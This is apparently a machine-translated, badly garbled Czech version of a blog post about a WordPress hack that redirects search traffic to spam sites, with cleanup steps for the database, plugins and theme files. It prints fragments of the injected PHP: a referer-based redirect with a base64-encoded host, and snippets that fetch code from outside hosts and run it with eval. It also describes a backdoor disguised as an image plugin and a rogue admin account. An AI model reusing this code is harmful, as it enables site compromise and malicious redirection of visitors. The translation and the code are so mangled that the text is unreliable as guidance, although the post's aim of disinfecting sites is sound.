WordPress Zaseknout: Nab�t v�dom� a Brynda Google a Hledat Motor �i Ne Cukrov� Doprava Redirected a� k Tv�j-Needs.info, AnyResults.Net, Pozlacen�-Info.net a Druh� Neplatn� Polohy

Po��ta�ov� pir�t ar existuj�c� celek mimo a� k zaseknout a hrdinsk� �in WordPress blogs hospoda u konce �len ur�it� tkanivo, bouda a injekce zlomyslny k�d do WordPress k�d� a b�ze dat aby redirect host a hits dle Google a druh� hledat motor a� k spam polohy jako takov� tv�j-needs.info, anyresults.net, pozlacen�-info.net, keymachine.de, beliy.us, seogoogle.us a mnoho druh� spam polohy aby n�kyp s mzda- pomoc�- cvaknout CPC reklamy. N�jak� zaseknout objevi se a� k c�l bigger dav do redirecting celek bez WordPress cukrov�. Bez been po��ta�ov� pir�t, tezaury doprava domnimivan� a� k dos�hnout �eho �len ur�it� blog a�koliv c�l.

P��znaky of �len ur�it� Hledat Motor Redirection Zaseknout

Bankovka aby ne celek p��znaky moci st�t se �pln�. Tam mo�e b�t v�ce ne� jeden metoda of pilka na kov byt�, kdo p�isp�t a� k neobvykl� hled�n� a mo�n� odhodl�n�.

• Jak�koliv cvaknout docela dle hledat motor jako takov� Google, Yahoo, AOL, MSN, Okna Aktivn� hledat kon�it, v�etn� blog jm�no, v�le b�t redirected a kup�edu a� k po��ta�ov� pir�t’ polohy jako takov� tv�j-needs.info, anyresults.net, pozlacen�-info.net, keymachine.de, beliy.us, seogoogle.us, j�t s duchem �asu barevn� pruh jist� a� k da�it se. �tec� p��stroj p�ijet v �len ur�it� po��ta�ov� pir�t blok j�t s duchem �asu t�� hledat provaz aby on �i ona zvykl� �emu hledat do hledat motor.
• Cvaknout d�le jeden b�t zapojen �len ur�it� blog d�le RSS krmen� ��tanka jako takov� Google ��tanka poc�novat b�t redirected a� k po��ta�ov� pir�t poloha p��li�.
• JEDEN host s ne ��et v rozhlase blog, �i ne logika ( odtud does ne 3sg.pr�z.od have cukrov� objevit do zlomyslny k�d), v�le b�t redirected a� k spam polohy.
• Ale b�t na n�v�t�v� dle hledat motor ar been redirected pry�, a �len ur�it� dob�hnout n�koho hospoda�it a� k bl�znit asi nejsp�e mno�stv� of bloggers, webmasters a poloha vlastnictv�, �i p�i nejmen��m br�nit �len ur�it� odhalen� of �len ur�it� ot�zka.
• N�hl� ohromn� a dramatick� hodit do po�tovn� schr�nky a nestihnout vlak of d�kladn� �init of host doprava a blok c�l do tkanivo cesta statistika, po v�tce krama�it s Google a�koliv dovol�vat se, i kdyby hledat motor kon�it hodnocen� is cel�.
• D�kladn� hodit do po�tovn� schr�nky of inzerovan� d�chod dle Google AdSense �i druh� reklamy p�enosov� �l�nek, �i p�ijmout d�stojnick� dekret.
• �len ur�it� n�sleduj�c� b�ze k�dovat PHP k�d moci objevit se v rozhlase wp-blog-header.php archiv:

  <?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ a�koliv $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==chybn�){ $ser1=”?;fale�; }
-li && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);v�chod; }? >

• Neur�. �len obraz, kdo is ve skute�nosti jeden chom�� of zlomyslny PHP k�d, was added a� k �len ur�it� wp- obsah/ p�esouvat adres��. Nap��klad, wp- obsah/ p�esouvat/2008/06/06/abcdefghijklmn.jpg, �i ono mo�e b�t j�dro tv�j ko�en leporelo, i.e. wp-contents/themes/classic/images/xyz.jpg. �len ur�it� jm�no of �len ur�it� obraz mo�e b�t do �len ur�it� d�t do form�tu of xxxxxx_old.jpeg.
• Neur�. �len dve�e was dodat do MySQL b�ze dat do WordPress wp_options a� k aktivovat �len ur�it� obraz ( �len ur�it� zlomyslny PHP k�d) a�koliv jeden �ep, typick� a�koliv rss_f541b3abd05e7962fcab37737f40fad8.
• Tam mo�e b�t rovn� zlomyslny k�d�, po v�tce those aby interpret s odhadnou() �i base64_decode() kontrolovat been dodat do druh� WordPress PHP archiv. P��klad ar �len ur�it� n�sleduj�c� k�d�:

  ifisset_GET'p'(($[])) {
$pono�ka = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ pono�ka, ‘ br�t http:/km20725.keymachine.de/ kam v�tr, tam pl᚝/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ pono�ka, ‘ dav: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ pono�ka));
$objem = vz�vat(”, $ objem);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ pono�ka);}
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ kam v�tr, tam pl᚝/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ kam v�tr, tam pl᚝/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  evalgzinflatebase64_decode(((

• WordPress ko�en to jest been aktivoval a opot�ebovan� poc�novat b�t vst�iknout s zaseknout k�d a afektovan� p��li�. Takov� k�d norm�ln� b�t do header.php �i index.php of �len ur�it� ko�en, a 3sg.pr�z.od have jeden bohatstv� podobn� a� k �len ur�it� pod

  ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

�len ur�it� WordPress hledat doprava redirect a� k spam poloha zaseknout st�t se nejsp�e d�ky bezpe�� j�ma a zranitelnost to jest ne do�asn� oprava kdy blog majitel rozhodnout rozch�zet se v n�zorech aktualizovat a� k nejnov�j�� l��en� of WordPress ( a�koliv n�jak�b�t zpravodajem aby jejich blogs been po��ta�ov� pir�t i kdyby its’ j� v rozhlase nejnov�j�� l��en� of WordPress 2.5.1). Jak�koliv �len ur�it� b�t p���inou, kac��stv�’ �len ur�it� brynda a roztok a� k analyzovat a porazit �len ur�it� zaseknout a� k pojistit aby tebe drah� bek �len ur�it� doprava a vyhnout se been pokutovat do Google do bezd�vodn� redirecting a� k spam blok.

1. Z�lohovat �len ur�it� WordPress b�ze dat.
2. Cvi�en� phpMyAdmin a� k krmivo WordPress MySQL b�ze dat tabulkov� uspo��dan� dokument. P�ikro�it k wp_options �astovat, a n�kdy po��dit kone�nou �pravu filmu �len ur�it� h�dka nazvan� active_plugins. �len ur�it� h�dka detail celek aktivn� �ep aby 3sg.pr�z.od have been aktivoval. Prod�lat �len ur�it� barevn� pruh ( do jeden bohatstv�), a hledat neur�. �len jeden �ep nazvan� nal�zt zal�ben� s neur�. �len obraz extenze, jako takov� .jpg, .jpeg, .gif a etc. Nap��klad, abcdefgh_old.jpeg. Zapsat �len ur�it� cesta a� k �len ur�it� obraz archiv.
3. Using sFTP �i SSH ( jednat ned�stojn� kolem FTP �i Telnet do bezpe��), n�kdy plout a� k �len ur�it� cesta of �len ur�it� archiv, a odstranit �len ur�it� archiv.
4. P�ikro�it k WordPress Spr�vce �ep �eln� deska, deactivate �i aktivovat jak�koliv �ep a� k vy��dit �len ur�it� zlomyslny �ep dle �len ur�it� “active_plugins” h�dka.
5. Bek a� k phpMyAdmin, v �len ur�it� wp_options �astovat, n�lez jeden h�dka aby b�t d�liteln� �len ur�it� n�sleduj�c� provaz a�koliv option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Odstranit �len ur�it� h�dka pry�.

   -li tebe dont’ v�d�t jak? a� k b�et �len ur�it� b�ze dat vy�i�t�n� detail do kr��e nad, kac��stv�’ jeden obr�zkov� termin�l u�itelsk�:

6. P�ikro�it k wp_users �astovat. -li tam is jeden bezejmenn� pr�vo u��v�n� ( anulovat barevn� t�n do user_nicename bitva) jmenovat v 000000:: d�le 0000-00-00, zapsat �len ur�it� pr�vo u��v�n� IDENTIFIKACE ( identifikace bitva, jeden ��slo). Odstranit �len ur�it� pr�vo u��v�n�.
7. Krmivo �len ur�it� wp_usermeta �astovat. Nal�zt celek rows s pr�vo u��v�n� sirka �len ur�it� IDENTIFIKACE of �len ur�it� odstranit neplatn� pr�vo u��v�n�. Tam ar norm�ln� trojka rows been spojoval a� k �len ur�it� n�jezdn�k pr�vo u��v�n� Identifikace. Odstranit celek �len ur�it� spojoval rows.
8. Logika a� k �len ur�it� kam v�tr, tam pl᚝ a� k po��dit kone�nou �pravu filmu �len ur�it� ko�en archiv, �i krmivo �len ur�it� ko�en archiv’ k�d do Ko�en Edi�n� program of WordPress Spr�vce C�l �eln� deska. �ek �len ur�it� header.php a index.php do jak�koliv podez�el� k�d. A�koliv zminka nad, hledat n�co podobn� a� k �len ur�it� bohatstv� pod:

   ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

   -li l�t, odstranit a chod �len ur�it� k�d. Bankovka aby �len ur�it� zlomyslny k�d v�le b�t n�kolik bohatstv� dlouh� hl�ska do celek.

9. -li its’ ne j� byt�, jmenovat neur�. �len hladov� index.html archiv do �len ur�it� wp- obsah/ �ep adres��. �len ur�it� bezv�razn� index.html use� �len ur�it� obsah of �len ur�it� �ep adres��, efektivn� �t�t jak� �ep-ins been opot�ebovan� dle po��ta�ov� pir�t a� k zatvrdit a p�it�hnout �len ur�it� WordPress bezpe��.
10. P�esouvat a d�t na d��v�j�� m�sto ka�d� a ka�d� WordPress archiv ( nejen wp-blog-header.php) v rozhlase kam v�tr, tam pl᚝ j�t s duchem �asu �erstv�, aktualizovan�, a origin�lnejnov�j�� l��en� dle WordPress (ov�em, a� na m�lo archiv jako takov� wp-config.php a ko�en). -li tv�j’ aktualizovat, ��st �len ur�it�b�t pr�vod��m opatrn�.
11. Burza tv�j heslo.
12. -li tebe m�t mnohon�sobn� pr�vo u��v�n�, burza jejich heslo ( �i pt�t se je a� k burza �len ur�it� heslo) p��li�.

d�le�it�: Tato is jeden stroj ch�pat blok kdo is darovat " a�koliv is" bez z�ruka. Strojov� p�eklad mo�e b�t nesnadn� a� k dov�dat se. B�t p��jemn� mluvit o n��emorigin�l Anglicky artikl kdykoli mo�n�.

D�l a p�isp�t �i br�t odborn� podep��t a pomoci vM� ��slicov� Duch F�rum.

P��buzn� Jednotliv� druhy zbo��

• P�idat NoFollow N�vaznost a� k WordPress Blogroll a� k Bonus PageRank
• WordPress �ep: Akciden�n� sazba Google Analytick� a FeedBurner B�t zpravodajem Statistika dle Poloha Admin
• Technorati Vch�zej�c� Golfov� h�i�t� �ep do WordPress
• JEDEN Letmo pohl�dnout na Google Obchodnik Hledat
• Jak? a� k Vyhnout se, Obtok �i Divoce rostouc� rostlina Google Pytel p�sku
• Cesta V�ce Doprava do Using Obraz
• SEO Laskav� Nov� verze Metoda a� k H�bat se Tkaniva URL Dle Podk�talogi a� k Kmen slova Matka Leporelo
• Ask.com Hledat Motor Konat p�ehl�dku do CNNMoney
• Integrovan� a Akciden�n� sazba Google AdSense do Hledat a Co-Op Celnice Hledat Motor Kon�it do WordPress Blog Blok M�ra
• Kdo Hledat Motor is �len ur�it� Nejl�pe a Nej�etn�j�� D�le�it�?

Tato dve�e was posta d�le �ter�, �erven 10th, 2008 v 103: am a is archiv chyb�j�c�-Weblogs. Tebe poc�novat doprov�zet jak�koliv citlivost p��stroje a� k tato dve�e docela �len ur�it�RSS 2.0 krmen� Tebe poc�novatdovolen� jeden citlivost p��stroje,�i trackback dle tv�j drah� poloha.